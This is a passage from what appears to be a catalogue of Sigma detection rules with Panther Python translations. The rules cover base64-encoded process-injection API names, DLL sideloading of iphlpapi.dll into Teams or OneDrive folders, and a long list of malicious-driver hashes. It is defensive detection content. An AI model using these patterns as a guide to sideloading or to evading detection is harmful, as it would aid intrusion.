            - 'MAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkA'
            - 'NyZWF0ZVJlbW90ZVRocmVhZ'
            - 'Q3JlYXRlUmVtb3RlVGhyZWFk'
            - 'QwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQA'
            - '0AZQBtAG0AbwB2AGUA'
            - '1lbW1vdm'
            - 'AGUAbQBtAG8AdgBlA'
            - 'bQBlAG0AbQBvAHYAZQ'
            - 'bWVtbW92Z'
            - 'ZW1tb3Zl'
    condition: all of selection_*
falsepositives:
    - Unknown
level: high

Convert to SIEM query

high

Malicious DLL File Dropped in the Teams or OneDrive Folder

Detects creation of a malicious DLL file in the location where the OneDrive or Team applications Upon execution of the Teams or OneDrive application, the dropped malicious DLL file ("iphlpapi.dll") is sideloaded

status test author frack113 id 1908fcc1-1b92-4272-8214-0fbaf2fa5163

panther query

def rule(event):
    if all(
        [
            "iphlpapi.dll" in event.deep_get("TargetFilename", default=""),
            "\\AppData\\Local\\Microsoft" in event.deep_get("TargetFilename", default=""),
        ]
    ):
        return True
    return False

view Sigma YAML

title: Malicious DLL File Dropped in the Teams or OneDrive Folder
id: 1908fcc1-1b92-4272-8214-0fbaf2fa5163
status: test
description: |
    Detects creation of a malicious DLL file in the location where the OneDrive or Team applications
    Upon execution of the Teams or OneDrive application, the dropped malicious DLL file ("iphlpapi.dll") is sideloaded
references:
    - https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/
author: frack113
date: 2022-08-12
tags:
    - attack.persistence
    - attack.privilege-escalation
    - attack.execution
    - attack.stealth
    - attack.t1574.001
logsource:
    category: file_event
    product: windows
detection:
    selection:
        TargetFilename|contains|all:
            - 'iphlpapi.dll'
            - '\AppData\Local\Microsoft'
    condition: selection
falsepositives:
    - Unknown
level: high

Convert to SIEM query

high

Malicious Driver Load

Detects loading of known malicious drivers via their hash.

status test author Nasreddine Bencherchali (Nextron Systems) id 05296024-fe8a-4baf-8f3d-9a5f5624ceb2

panther query

def rule(event):
    if any(
        [
            "MD5=5be61a24f50eb4c94d98b8a82ef58dcf" in event.deep_get("Hashes", default=""),
            "MD5=d70a80fc73dd43469934a7b1cc623c76" in event.deep_get("Hashes", default=""),
            "MD5=3b71eab204a5f7ed77811e41fed73105" in event.deep_get("Hashes", default=""),
            "MD5=528ce5ce19eb34f401ef024de7ddf222" in event.deep_get("Hashes", default=""),
            "MD5=ae548418b491cd3f31618eb9e5730973" in event.deep_get("Hashes", default=""),
            "MD5=72f53f55898548767e0276c472be41e8" in event.deep_get("Hashes", default=""),
            "MD5=508faa4647f305a97ed7167abc4d1330" in event.deep_get("Hashes", default=""),
            "MD5=ed2b653d55c03f0bffa250372d682b75" in event.deep_get("Hashes", default=""),
            "MD5=0d2ba47286f1c68e87622b3a16bf9d92" in event.deep_get("Hashes", default=""),
            "MD5=3164bd6c12dd0fe1bdf3b833d56323b9" in event.deep_get("Hashes", default=""),
            "MD5=70fd7209ce5c013a1f9e699b5cc86cdc" in event.deep_get("Hashes", default=""),
            "MD5=c71be7b112059d2dc84c0f952e04e6cc" in event.deep_get("Hashes", default=""),
            "MD5=acac842a46f3501fe407b1db1b247a0b" in event.deep_get("Hashes", default=""),
            "MD5=01c2e4d8234258451083d6ce4e8910b7" in event.deep_get("Hashes", default=""),
            "MD5=c8541a9cef64589593e999968a0385b9" in event.deep_get("Hashes", default=""),
            "MD5=e172a38ade3aa0a2bc1bf9604a54a3b5" in event.deep_get("Hashes", default=""),
            "MD5=6fcf56f6ca3210ec397e55f727353c4a" in event.deep_get("Hashes", default=""),
            "MD5=2b80be31fbb11d4c1ef6d6a80b2e0c16" in event.deep_get("Hashes", default=""),
            "MD5=07056573d464b0f5284f7e3acedd4a3f" in event.deep_get("Hashes", default=""),
            "MD5=c7b7f1edb9bbef174e6506885561d85d" in event.deep_get("Hashes", default=""),
            "MD5=d5918d735a23f746f0e83f724c4f26e5" in event.deep_get("Hashes", default=""),
            "MD5=84763d8ca9fe5c3bff9667b2adf667de" in event.deep_get("Hashes", default=""),
            "MD5=fb593b1f1f80d20fc7f4b818065c64b6" in event.deep_get("Hashes", default=""),
            "MD5=909f3fc221acbe999483c87d9ead024a" in event.deep_get("Hashes", default=""),
            "MD5=e29f6311ae87542b3d693c1f38e4e3ad" in event.deep_get("Hashes", default=""),
            "MD5=aeb0801f22d71c7494e884d914446751" in event.deep_get("Hashes", default=""),
            "MD5=3f11a94f1ac5efdd19767c6976da9ba4" in event.deep_get("Hashes", default=""),
            "MD5=be6318413160e589080df02bb3ca6e6a" in event.deep_get("Hashes", default=""),
            "MD5=0b311af53d2f4f77d30f1aed709db257" in event.deep_get("Hashes", default=""),
            "MD5=d075d56dfce6b9b13484152b1ef40f93" in event.deep_get("Hashes", default=""),
            "MD5=27384ec4c634701012a2962c30badad2" in event.deep_get("Hashes", default=""),
            "MD5=5eb2c576597dd21a6b44557c237cf896" in event.deep_get("Hashes", default=""),
            "MD5=f56db4eba3829c0918413b5c0b42f00f" in event.deep_get("Hashes", default=""),
            "MD5=e27b2486aa5c256b662812b465b6036c" in event.deep_get("Hashes", default=""),
            "MD5=db86dfd7aefbb5be6728a63461b0f5f3" in event.deep_get("Hashes", default=""),
            "MD5=04a88f5974caa621cee18f34300fc08a" in event.deep_get("Hashes", default=""),
            "MD5=5129d8fd53d6a4aba81657ab2aa5d243" in event.deep_get("Hashes", default=""),
            "MD5=cd2c641788d5d125c316ed739c69bb59" in event.deep_get("Hashes", default=""),
            "MD5=7073cd0085fcba1cd7d3568f9e6d652c" in event.deep_get("Hashes", default=""),
            "MD5=24f0f2b4b3cdae11de1b81c537df41c7" in event.deep_get("Hashes", default=""),
            "MD5=88bea56ae9257b40063785cf47546024" in event.deep_get("Hashes", default=""),
            "MD5=63060b756377fce2ce4ab9d079ca732f" in event.deep_get("Hashes", default=""),
            "MD5=50b39072d0ee9af5ef4824eca34be6e3" in event.deep_get("Hashes", default=""),
            "MD5=57c18a8f5d1ba6d015e4d5bc698e3624" in event.deep_get("Hashes", default=""),
            "MD5=7d26985a5048bad57d9c223362f3d55c" in event.deep_get("Hashes", default=""),
            "MD5=ba54a0dbe2685e66e21d41b4529b3528" in event.deep_get("Hashes", default=""),
            "MD5=4ad8fd9e83d7200bd7f8d0d4a9abfb11" in event.deep_get("Hashes", default=""),
            "MD5=b52f51bbe6b49d0b475d943c29c4d4cb" in event.deep_get("Hashes", default=""),
            "MD5=a837302307dace2a00d07202b661bce2" in event.deep_get("Hashes", default=""),
            "MD5=78a122d926ccc371d60c861600c310f3" in event.deep_get("Hashes", default=""),
            "MD5=bdb305aa0806f8b38b7ce43c927fe919" in event.deep_get("Hashes", default=""),
            "MD5=27053e964667318e1b370150cbca9138" in event.deep_get("Hashes", default=""),
            "MD5=6a4fbcfb44717eae2145c761c1c99b6a" in event.deep_get("Hashes", default=""),
            "MD5=d13c1b76b4a1ca3ff5ab63678b51df6d" in event.deep_get("Hashes", default=""),
            "MD5=6a066d2be83cf83f343d0550b0b8f206" in event.deep_get("Hashes", default=""),
            "MD5=7108b0d4021af4c41de2c223319cd4c1" in event.deep_get("Hashes", default=""),
            "MD5=1cd158a64f3d886357535382a6fdad75" in event.deep_get("Hashes", default=""),
            "MD5=e939448b28a4edc81f1f974cebf6e7d2" in event.deep_get("Hashes", default=""),
            "MD5=4198d3db44d7c4b3ba9072d258a4fc2d" in event.deep_get("Hashes", default=""),
            "MD5=4a27a2bdc6fbe39eeec6455fb1e0ef20" in event.deep_get("Hashes", default=""),
            "MD5=30ca3cc19f001a8f12c619daa8c6b6e3" in event.deep_get("Hashes", default=""),
            "MD5=fe9004353b25640f6a879e57f07122d7" in event.deep_get("Hashes", default=""),
            "MD5=06c7fcf3523235cf52b3eee083ec07b2" in event.deep_get("Hashes", default=""),
            "MD5=364605ad21b9275681cffef607fac273" in event.deep_get("Hashes", default=""),
            "MD5=968ddb06af90ef83c5f20fbdd4eee62e" in event.deep_get("Hashes", default=""),
            "MD5=ba50bd645d7c81416bb26a9d39998296" in event.deep_get("Hashes", default=""),
            "MD5=29e03f4811b64969e48a99300978f58c" in event.deep_get("Hashes", default=""),
            "MD5=b0770094c3c64250167b55e4db850c04" in event.deep_get("Hashes", default=""),
            "MD5=40b968ecdbe9e967d92c5da51c390eee" in event.deep_get("Hashes", default=""),
            "MD5=b6b530dd25c5eb66499968ec82e8791e" in event.deep_get("Hashes", default=""),
            "MD5=f209cb0e468ca0b76d879859d5c8c54e" in event.deep_get("Hashes", default=""),
            "MD5=76f8607fc4fb9e828d613a7214436b66" in event.deep_get("Hashes", default=""),
            "MD5=4b058945c9f2b8d8ebc485add1101ba5" in event.deep_get("Hashes", default=""),
            "MD5=faae7f5f69fde12303dd1c0c816b72b7" in event.deep_get("Hashes", default=""),
            "MD5=89d294ef7fefcdf1a6ca0ab96a856f57" in event.deep_get("Hashes", default=""),
            "MD5=ef0e1725aaf0c6c972593f860531a2ea" in event.deep_get("Hashes", default=""),
            "MD5=bbdbffebfc753b11897de2da7c9912a5" in event.deep_get("Hashes", default=""),
            "MD5=5ebfc0af031130ba9de1d5d3275734b3" in event.deep_get("Hashes", default=""),
            "MD5=22949977ce5cd96ba674b403a9c81285" in event.deep_get("Hashes", default=""),
            "MD5=77cfd3943cc34d9f5279c330cd8940bc" in event.deep_get("Hashes", default=""),
            "MD5=311de109df18e485d4a626b5dbe19bc6" in event.deep_get("Hashes", default=""),
            "MD5=2730cc25ad385acc7213a1261b21c12d" in event.deep_get("Hashes", default=""),
            "MD5=87dc81ebe85f20c1a7970e495a778e60" in event.deep_get("Hashes", default=""),
            "MD5=154b45f072fe844676e6970612fd39c7" in event.deep_get("Hashes", default=""),
            "MD5=5a4fe297c7d42539303137b6d75b150d" in event.deep_get("Hashes", default=""),
            "MD5=d6a1dd7b2c06f058b408b3613c13d413" in event.deep_get("Hashes", default=""),
            "MD5=a6e9d6505f6d2326a8a9214667c61c67" in event.deep_get("Hashes", default=""),
            "MD5=7fad9f2ef803496f482ce4728578a57a" in event.deep_get("Hashes", default=""),
            "MD5=5076fba3d90e346fd17f78db0a4aa12c" in event.deep_get("Hashes", default=""),
            "MD5=79df0eabbf2895e4e2dae15a4772868c" in event.deep_get("Hashes", default=""),
            "MD5=14580bd59c55185115fd3abe73b016a2" in event.deep_get("Hashes", default=""),
            "MD5=1f2888e57fdd6aee466962c25ba7d62d" in event.deep_get("Hashes", default=""),
            "MD5=5e9231e85cecfc6141e3644fda12a734" in event.deep_get("Hashes", default=""),
            "MD5=dc564bac7258e16627b9de0ce39fae25" in event.deep_get("Hashes", default=""),
            "MD5=4e4c068c06331130334f23957fca9e3c" in event.deep_get("Hashes", default=""),
            "MD5=1ee9f6326649cd23381eb9d7dfdeddf7" in event.deep_get("Hashes", default=""),
            "MD5=4e1f656001af3677856f664e96282a6f" in event.deep_get("Hashes", default=""),
            "MD5=36f44643178c505ea0384e0fb241e904" in event.deep_get("Hashes", default=""),
            "MD5=6b480fac7caca2f85be9a0cfe79aedfc" in event.deep_get("Hashes", default=""),
            "MD5=c1ab425977d467b64f437a6c5ad82b44" in event.deep_get("Hashes", default=""),
            "MD5=fe508caa54ffeb2285d9f00df547fe4a" in event.deep_get("Hashes", default=""),
            "MD5=d3af70287de8757cebc6f8d45bb21a20" in event.deep_get("Hashes", default=""),
            "MD5=990b949894b7dc82a8cf1131b063cb1a" in event.deep_get("Hashes", default=""),
            "MD5=c62209b8a5daf3f32ad876ad6cefda1b" in event.deep_get("Hashes", default=""),
            "MD5=c159fb0f345a8771e56aab8e16927361" in event.deep_get("Hashes", default=""),
            "MD5=19b15eeccab0752c6793f782ca665a45" in event.deep_get("Hashes", default=""),
            "MD5=1d51029dfbd616bf121b40a0d1efeb10" in event.deep_get("Hashes", default=""),
            "MD5=157a22689629ec876337f5f9409918d5" in event.deep_get("Hashes", default=""),
            "MD5=3dd829fb27353622eff34be1eabb8f18" in event.deep_get("Hashes", default=""),
            "MD5=8636fe3724f2bcba9399daffd6ef3c7e" in event.deep_get("Hashes", default=""),
            "MD5=3d0b3e19262099ade884b75ba86ca7e8" in event.deep_get("Hashes", default=""),
            "MD5=97539c78d6e2b5356ce79e40bcd4d570" in event.deep_get("Hashes", default=""),
            "MD5=0308b6888e0f197db6704ca20203eee4" in event.deep_get("Hashes", default=""),
            "MD5=091a6bd4880048514c5dd3bede15eba5" in event.deep_get("Hashes", default=""),
            "MD5=7e92f98b809430622b04e88441b2eb04" in event.deep_get("Hashes", default=""),
            "MD5=bb5bda8889d8d27ef984dbd6ad82c946" in event.deep_get("Hashes", default=""),
            "MD5=b76aee508f68b5b6dccd6e1f66f4cf8b" in event.deep_get("Hashes", default=""),
            "MD5=a822b9e6eedf69211013e192967bf523" in event.deep_get("Hashes", default=""),
            "MD5=df52f8a85eb64bc69039243d9680d8e4" in event.deep_get("Hashes", default=""),
            "MD5=bfbdea0589fb77c7a7095cf5cd6e8b7a" in event.deep_get("Hashes", default=""),
            "MD5=44857ca402a15ab51dc5afe47abdfa44" in event.deep_get("Hashes", default=""),
            "MD5=f9844524fb0009e5b784c21c7bad4220" in event.deep_get("Hashes", default=""),
            "MD5=d34b218c386bfe8b1f9c941e374418d7" in event.deep_get("Hashes", default=""),
            "MD5=0ca010a32a9b0aeae1e46d666b83b659" in event.deep_get("Hashes", default=""),
            "MD5=93496a436c5546156a69deb255a9fed0" in event.deep_get("Hashes", default=""),
            "MD5=1cd5e231064e03c596e819b6ff48daf9" in event.deep_get("Hashes", default=""),
            "MD5=70a71fe86df717ac59dbf856d7ac5789" in event.deep_get("Hashes", default=""),
            "MD5=a33089d4e50f7d2ea8b52ca95d26ebf3" in event.deep_get("Hashes", default=""),
            "MD5=e0cc9b415d884f85c45be145872892b8" in event.deep_get("Hashes", default=""),
            "MD5=a42249a046182aaaf3a7a7db98bfa69d" in event.deep_get("Hashes", default=""),
            "MD5=c5ae6ca044bd03c3506c132b033be1dc" in event.deep_get("Hashes", default=""),
            "MD5=7ebe606acd81abf1f8cb0767c974164b" in event.deep_get("Hashes", default=""),
            "MD5=b5dcc869a91efcc6e8ea0c3c07605d63" in event.deep_get("Hashes", default=""),
            "MD5=62c18d61ed324088f963510bae43b831" in event.deep_get("Hashes", default=""),
            "MD5=093a2a635c3a27aac50efd6463f4efa1" in event.deep_get("Hashes", default=""),
            "MD5=28102acca39ad0199f262ba9958be3f4" in event.deep_get("Hashes", default=""),
            "MD5=650ef9dd70cb192027e536754d6e0f63" in event.deep_get("Hashes", default=""),
            "MD5=32eb3d2bf2c5b3da2d2a1f20fffbac44" in event.deep_get("Hashes", default=""),
            "MD5=6771b13a53b9c7449d4891e427735ea2" in event.deep_get("Hashes", default=""),
            "MD5=072ba2309b825ce1dba37d8d924ea8ed" in event.deep_get("Hashes", default=""),
            "MD5=2d37d2fb9b9f8ac52bc02cba4487e3cb" in event.deep_get("Hashes", default=""),
            "MD5=1325ec39e98225e487b40043faee8052" in event.deep_get("Hashes", default=""),
            "MD5=4484f4007de2c3ee4581a2cff77ca3b4" in event.deep_get("Hashes", default=""),
            "MD5=a236e7d654cd932b7d11cb604629a2d0" in event.deep_get("Hashes", default=""),
            "MD5=17509f0a98dc5c5d52c3f9ac1428a21b" in event.deep_get("Hashes", default=""),
            "MD5=840a5edf2534dd23a082cf7b28cbfc4d" in event.deep_get("Hashes", default=""),
            "MD5=77a7ed4798d02ef6636cd0fd07fc382a" in event.deep_get("Hashes", default=""),
            "MD5=a9df5964635ef8bd567ae487c3d214c4" in event.deep_get("Hashes", default=""),
            "MD5=8b75047199825c8e62fdcc1c915db8bd" in event.deep_get("Hashes", default=""),
            "MD5=d416494232c4197cb36a914df2e17677" in event.deep_get("Hashes", default=""),
            "MD5=4cf14a96485a1270fed97bb8000e4f86" in event.deep_get("Hashes", default=""),
            "MD5=35e512f9bedc89dca5ce81f35820714c" in event.deep_get("Hashes", default=""),
            "MD5=40f35792e7565aa047796758a3ce1b77" in event.deep_get("Hashes", default=""),
            "MD5=f7f31bccc9b7b2964ac85106831022b1" in event.deep_get("Hashes", default=""),
            "MD5=26aedc10d4215ba997495d3a68355f4a" in event.deep_get("Hashes", default=""),
            "MD5=10f3679384a03cb487bda9621ceb5f90" in event.deep_get("Hashes", default=""),
            "MD5=80219fb6b5954c33e16bac5ecdac651b" in event.deep_get("Hashes", default=""),
            "MD5=cee36b5c6362993fa921435979bfbe4a" in event.deep_get("Hashes", default=""),
            "MD5=e37a08f516b8a7ca64163f5d9e68fe5a" in event.deep_get("Hashes", default=""),
            "MD5=49518f7375a5f995ebe9423d8f19cfe4" in event.deep_get("Hashes", default=""),
            "MD5=920df6e42cf91bbe19707f5a86e3c5c5" in event.deep_get("Hashes", default=""),
            "MD5=2ec877e425bd7eddb663627216e3491e" in event.deep_get("Hashes", default=""),
            "MD5=550b7991d93534bc510bc4f237155a7a" in event.deep_get("Hashes", default=""),
            "MD5=98d53f6b3bec0a3417a04fbb9e17fa06" in event.deep_get("Hashes", default=""),
            "MD5=13a57a4ef721440c7c9208b51f7c05de" in event.deep_get("Hashes", default=""),
            "MD5=c5fc3605194e033bdf3781ff2adaeb61" in event.deep_get("Hashes", default=""),
            "MD5=6e625ec04c20a9dbd48c7060efbf5e92" in event.deep_get("Hashes", default=""),
            "MD5=0b9b78d1281c7d4ab50497cf6ea7452a" in event.deep_get("Hashes", default=""),
            "MD5=4e906fcb13e2793c98f47291fd69391b" in event.deep_get("Hashes", default=""),
            "MD5=2bb353891d65c9e267eb98a3a2b694c3" in event.deep_get("Hashes", default=""),
            "MD5=7d86cdda7f49f91fdb69901a002b34e7" in event.deep_get("Hashes", default=""),
            "MD5=f69b06ca7c34d16f26ea1c6861edf62a" in event.deep_get("Hashes", default=""),
            "MD5=ee6b1a79cb6641aa44c762ee90786fe0" in event.deep_get("Hashes", default=""),
            "MD5=1fc7aeeff3ab19004d2e53eae8160ab1" in event.deep_get("Hashes", default=""),
            "MD5=24d3ea54f25e32832ac20335a1ce1062" in event.deep_get("Hashes", default=""),
            "MD5=c94f405c5929cfcccc8ad00b42c95083" in event.deep_get("Hashes", default=""),
            "MD5=b164daf106566f444dfb280d743bc2f7" in event.deep_get("Hashes", default=""),
            "MD5=93130909e562925597110a617f05e2a9" in event.deep_get("Hashes", default=""),
            "MD5=f589d4bf547c140b6ec8a511ea47c658" in event.deep_get("Hashes", default=""),
            "MD5=bf445ac375977ecf551bc2a912c58e8a" in event.deep_get("Hashes", default=""),
            "MD5=629ee55e4b5a225d048fbcd5f0a1d18b" in event.deep_get("Hashes", default=""),
            "MD5=0023ca0ca16a62d93ef51f3df98b2f94" in event.deep_get("Hashes", default=""),
            "MD5=a3d69c7e24300389b56782aa63b0e357" in event.deep_get("Hashes", default=""),
            "MD5=cbd8d370462503508e44dba023bdf9bc" in event.deep_get("Hashes", default=""),
            "MD5=67daa04716803a15fc11c9e353d77c2f" in event.deep_get("Hashes", default=""),
            "MD5=c9d4214c850e0cedf033dc8f0cd3aace" in event.deep_get("Hashes", default=""),
            "MD5=bd5b0514f3b40f139d8079138d01b5f6" in event.deep_get("Hashes", default=""),
            "MD5=19bdd9b799e3c2c54c0d7fff68b31c20" in event.deep_get("Hashes", default=""),
            "MD5=f242cffd9926c0ccf94af3bf16b6e527" in event.deep_get("Hashes", default=""),
            "MD5=5aeab9427d85951def146b4c0a44fc63" in event.deep_get("Hashes", default=""),
            "MD5=40170485cca576adb5266cf5b0d3b0bd" in event.deep_get("Hashes", default=""),
            "MD5=c277c4386a78fae1b7e17eaecf4f472b" in event.deep_get("Hashes", default=""),
            "MD5=58c37866cbc3d1338e4fc58ada924ffe" in event.deep_get("Hashes", default=""),
            "MD5=0f16a43f7989034641fd2de3eb268bf1" in event.deep_get("Hashes", default=""),
            "MD5=0ae30291c6cbfa7be39320badd6e8de0" in event.deep_get("Hashes", default=""),
            "MD5=05dd59bd4f175304480affd8f1305c37" in event.deep_get("Hashes", default=""),
            "MD5=f838f4eb36f1e7036238776c7a70f0b0" in event.deep_get("Hashes", default=""),
            "MD5=85093bb9f027027c2c61aee50796de30" in event.deep_get("Hashes", default=""),
            "MD5=ae338d91d1b05a72559b7f6ed717362d" in event.deep_get("Hashes", default=""),
            "MD5=bd91787b5dcb2189b856804e85dfa1d9" in event.deep_get("Hashes", default=""),
            "MD5=6b3c1511e12f4d27a4ea3b18020d7b84" in event.deep_get("Hashes", default=""),
            "MD5=97264fd62d4907bdac917917a07b3b7a" in event.deep_get("Hashes", default=""),
            "MD5=6ececf26ff8b03ed7ffbddadec9a9dab" in event.deep_get("Hashes", default=""),
            "MD5=47e6ac52431ca47da17248d80bf71389" in event.deep_get("Hashes", default=""),
            "MD5=eb57f03b7603f0b235af62e8cd5be8c2" in event.deep_get("Hashes", default=""),
            "MD5=e1a9aa4c14669b1fb1f67a7266f87e82" in event.deep_get("Hashes", default=""),
            "MD5=29047f0b7790e524b09a06852d31a117" in event.deep_get("Hashes", default=""),
            "MD5=4dd6250eb2d368f500949952eb013964" in event.deep_get("Hashes", default=""),
            "MD5=fb7c61ef427f9b2fdff3574ee6b1819b" in event.deep_get("Hashes", default=""),
            "MD5=844af8c877f5da723c1b82cf6e213fc1" in event.deep_get("Hashes", default=""),
            "MD5=e39152eadd76751b1d7485231b280948" in event.deep_get("Hashes", default=""),
            "MD5=ac6e29f535b2c42999c50d2fc32f2c9c" in event.deep_get("Hashes", default=""),
            "MD5=2406ea37152d2154be3fef6d69ada2c6" in event.deep_get("Hashes", default=""),
            "MD5=0ea8389589c603a8b05146bd06020597" in event.deep_get("Hashes", default=""),
            "MD5=754e21482baf18b8b0ed0f4be462ba03" in event.deep_get("Hashes", default=""),
            "MD5=c4a517a02ba9f6eac5cf06e3629cc076" in event.deep_get("Hashes", default=""),
            "MD5=32282e07db321e8d7849f2287bb6a14f" in event.deep_get("Hashes", default=""),
            "MD5=32b67a6cd6dd998b9f563ed13d54a8bc" in event.deep_get("Hashes", default=""),
            "MD5=3359e1d4244a7d724949c63e89689ef8" in event.deep_get("Hashes", default=""),
            "MD5=5917e415a5bf30b3fcbcbcb8a4f20ee0" in event.deep_get("Hashes", default=""),
            "MD5=0bdd51cc33e88b5265dfb7d88c5dc8d6" in event.deep_get("Hashes", default=""),
            "MD5=a90236e4962620949b720f647a91f101" in event.deep_get("Hashes", default=""),
            "MD5=ccde8c94439f9fc9c42761e4b9a23d97" in event.deep_get("Hashes", default=""),
            "MD5=68caf620ef8deaf06819cf8c80d3367b" in event.deep_get("Hashes", default=""),
            "MD5=5fec28e8f4f76e5ede24beb32a32b9d7" in event.deep_get("Hashes", default=""),
            "MD5=e8eac6642b882a6196555539149c73f2" in event.deep_get("Hashes", default=""),
            "MD5=aa98b95f5cbae8260122de06a215ee10" in event.deep_get("Hashes", default=""),
            "MD5=a5bcaa2fc87b42e2e5d62a2e5dfcbc80" in event.deep_get("Hashes", default=""),
            "MD5=abc168fdca7169bf9dc40cec9761018d" in event.deep_get("Hashes", default=""),
            "MD5=7f9309f5e4defec132b622fadbcad511" in event.deep_get("Hashes", default=""),
            "MD5=4748696211bd56c2d93c21cab91e82a5" in event.deep_get("Hashes", default=""),
            "MD5=48394dce30bb8da5ae089cb8f41b86dc" in event.deep_get("Hashes", default=""),
            "MD5=65f800e1112864bf41eb815649f428d5" in event.deep_get("Hashes", default=""),
            "MD5=bd25be845c151370ff177509d95d5add" in event.deep_get("Hashes", default=""),
            "MD5=a37ed7663073319d02f2513575a22995" in event.deep_get("Hashes", default=""),
            "MD5=2c39f6172fbc967844cac12d7ab2fa55" in event.deep_get("Hashes", default=""),
            "MD5=491aec2249ad8e2020f9f9b559ab68a8" in event.deep_get("Hashes", default=""),
            "MD5=1e0eb80347e723fa31fce2abb0301d44" in event.deep_get("Hashes", default=""),
            "MD5=a26363e7b02b13f2b8d697abb90cd5c3" in event.deep_get("Hashes", default=""),
            "MD5=4118b86e490aed091b1a219dba45f332" in event.deep_get("Hashes", default=""),
            "MD5=6d131a7462e568213b44ef69156f10a5" in event.deep_get("Hashes", default=""),
            "MD5=10c2ea775c9e76e7774ab89e38f38287" in event.deep_get("Hashes", default=""),
            "SHA1=994e3f5dd082f5d82f9cc84108a60d359910ba79" in event.deep_get("Hashes", default=""),
            "SHA1=4f7989ad92b8c47c004d3731b7602ce0934d7a23" in event.deep_get("Hashes", default=""),
            "SHA1=f2fe02e28cf418d935ec63168caf4dff6a9fbdfe" in event.deep_get("Hashes", default=""),
            "SHA1=af42afda54d150810a60baa7987f9f09d49d1317" in event.deep_get("Hashes", default=""),
            "SHA1=09375f13521fc0cacf2cf0a28b2a9248f71498d7" in event.deep_get("Hashes", default=""),
            "SHA1=c75e8fceed74a4024d38ca7002d42e1ecf982462" in event.deep_get("Hashes", default=""),
            "SHA1=03e82eae4d8b155e22ffdafe7ba0c4ab74e8c1a7" in event.deep_get("Hashes", default=""),
            "SHA1=e730eb971ecb493b69de2308b6412836303f733a" in event.deep_get("Hashes", default=""),
            "SHA1=6a95860594cd8b7e3636bafa8f812e05359a64ca" in event.deep_get("Hashes", default=""),
            "SHA1=5fef884a901e81ac173d63ade3f5c51694decf74" in event.deep_get("Hashes", default=""),
            "SHA1=a8ddb7565b61bc021cd2543a137e00627f999dcc" in event.deep_get("Hashes", default=""),
            "SHA1=6451522b1fb428e549976d0742df5034f8124b17" in event.deep_get("Hashes", default=""),
            "SHA1=8ad0919629731b9a8062f7d3d4a727b28f22e81a" in event.deep_get("Hashes", default=""),
            "SHA1=cc65bf60600b64feece5575f21ab89e03a728332" in event.deep_get("Hashes", default=""),
            "SHA1=bbc8bd714c917bb1033f37e4808b4b002cd04166" in event.deep_get("Hashes", default=""),
            "SHA1=4f2d9a70ea24121ae01df8a76ffba1f9cc0fde4a" in event.deep_get("Hashes", default=""),
            "SHA1=f6a18fc9c4abe4a82c1ab28abc0a7259df8de7a3" in event.deep_get("Hashes", default=""),
            "SHA1=c42178977bd7bbefe084da0129ed808cb7266204" in event.deep_get("Hashes", default=""),
            "SHA1=766949d4599fbf8f45e888c9d6fedf21e04fb333" in event.deep_get("Hashes", default=""),
            "SHA1=b7ff8536553cb236ea2607941e634b23aadb59ee" in event.deep_get("Hashes", default=""),
            "SHA1=76789196eebfd4203f477a5a6c75eefc12d9a837" in event.deep_get("Hashes", default=""),
            "SHA1=e5566684a9e0c1afadae80c3a8be6636f6cad7cf" in event.deep_get("Hashes", default=""),
            "SHA1=7638c048af5beae44352764390deea597cc3e7b1" in event.deep_get("Hashes", default=""),
            "SHA1=6a6fe0d69e0ea34d695c3b525e6db639f9ad6ac5" in event.deep_get("Hashes", default=""),
            "SHA1=08dd35dde6187af579a1210e00eadbcea29e66d2" in event.deep_get("Hashes", default=""),
            "SHA1=9ee31f1f25f675a12b7bad386244a9fbfa786a87" in event.deep_get("Hashes", default=""),
            "SHA1=3ef30c95e40a854cc4ded94fc503d0c3dc3e620e" in event.deep_get("Hashes", default=""),
            "SHA1=a804ebec7e341b4d98d9e94f6e4860a55ea1638d" in event.deep_get("Hashes", default=""),
            "SHA1=505546d82aab56889a923004654b9afdec54efe6" in event.deep_get("Hashes", default=""),
            "SHA1=0fe2d22bd2e6b7874f4f2b6279e2ca05edd1222a" in event.deep_get("Hashes", default=""),
            "SHA1=8aa0e832e5ca2eb79dafabadbe9948a191008383" in event.deep_get("Hashes", default=""),
            "SHA1=844d7bcd1a928d340255ff42971cca6244a459bf" in event.deep_get("Hashes", default=""),
            "SHA1=9e2ebc489c50b6bbae3b08473e007baa65ff208f" in event.deep_get("Hashes", default=""),
            "SHA1=7e836dadc2e149a0b758c7e22c989cbfcce18684" in event.deep_get("Hashes", default=""),
            "SHA1=2480549ec8564cd37519a419ab2380cf3e8bab9e" in event.deep_get("Hashes", default=""),
            "SHA1=8b9dd4c001f17e7835fdaf0d87a2f3e026557e84" in event.deep_get("Hashes", default=""),
            "SHA1=d3f6c3ea2ef7124403c0fb6e7e3a0558729b5285" in event.deep_get("Hashes", default=""),
            "SHA1=40df7a55c200371853cc3fd3cc03b5ac932f5cd6" in event.deep_get("Hashes", default=""),
            "SHA1=607387cc90b93d58d6c9a432340261fde846b1d9" in event.deep_get("Hashes", default=""),
            "SHA1=2779c54ccd1c008cd80e88c2b454d76f4fa18c07" in event.deep_get("Hashes", default=""),
            "SHA1=46c9a474a1a62c25a05bc7661b75a80b471616e6" in event.deep_get("Hashes", default=""),
            "SHA1=a2fe7de67b3f7d4b1def88ce4ba080f473c0fbc6" in event.deep_get("Hashes", default=""),
            "SHA1=b8b123a413b7bccfa8433deba4f88669c969b543" in event.deep_get("Hashes", default=""),
            "SHA1=bf2f8ada4e80aed4710993cedf4c5d32c95cd509" in event.deep_get("Hashes", default=""),
            "SHA1=e3a1e7ce9e9452966885371e4c7fb48a2efdef22" in event.deep_get("Hashes", default=""),
            "SHA1=c7f0423ac5569f13d2b195e02741ad7eed839c6d" in event.deep_get("Hashes", default=""),
            "SHA1=a111dc6ae5575977feba71ee69b790e056846a02" in event.deep_get("Hashes", default=""),
            "SHA1=ac4ace1c21c5cb72c6edf6f2f0cc3513d7c942c3" in event.deep_get("Hashes", default=""),
            "SHA1=d4304bc75c2cb9917bb10a1dc630b75af194f7b2" in event.deep_get("Hashes", default=""),
            "SHA1=0de86ec7d7f16a3680df89256548301eed970393" in event.deep_get("Hashes", default=""),
            "SHA1=b2fb5036b29b12bcec04c3152b65b67ca14d61f2" in event.deep_get("Hashes", default=""),
            "SHA1=0883a9c54e8442a551994989db6fc694f1086d41" in event.deep_get("Hashes", default=""),
